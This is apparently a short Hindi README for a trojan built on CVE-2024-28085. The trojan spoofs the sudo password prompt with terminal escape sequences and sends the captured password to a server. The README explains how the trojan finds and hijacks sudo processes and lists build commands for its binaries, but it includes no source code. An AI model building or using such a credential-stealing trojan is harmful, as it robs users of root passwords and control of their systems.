
trojan CVE-2024-28085 CVE 28085
CVE-2024-28085 (https://people.rit.edu/sjf5462/6831711781/wall_2_27_2024.txt) पर आधारित ट्रोजन जो अभी तक कहीं ठीक नहीं हुआ है। सार: bash escape कोड का समर्थन करता है और हम टर्मिनल में स्ट्रिंग के रूप को नियंत्रित कर सकते हैं। ट्रोजन प्रक्रियाओं को सुनता है और sudo कमांड के pid को खोजता है, इसके पैरेंट को पता करता है और रूट को मारता है, एक नकली SUDO स्ट्रिंग डालता है।
उपयोगकर्ता टर्मिनल पर sudo <...> कमांड निष्पादित करता है और ट्रोजन उसकी प्रक्रिया को बदल देता है, जिससे पासवर्ड sudo में नहीं बल्कि टर्मिनल में दर्ज होता है। फिर पासवर्ड सर्वर पर चला जाता है।
कोड परीक्षण और जानकारी के उद्देश्य से बनाया गया है, और लेखक इसके आगे के उपयोग के लिए जिम्मेदार नहीं है।
Build:
g++ -static sleepall.cpp -o sleepall
gcc server.c -o server
नकली प्रॉम्प्ट की फोटो:
टर्मिनल में वास्तव में क्या हो रहा है, इसकी फोटो:
उपयोगकर्ता को प्रक्रिया नियंत्रण की अनुमति है:
निषिद्ध:
P.S.: वाह, लेकिन केवल bash में काम करता है (zsh में नहीं)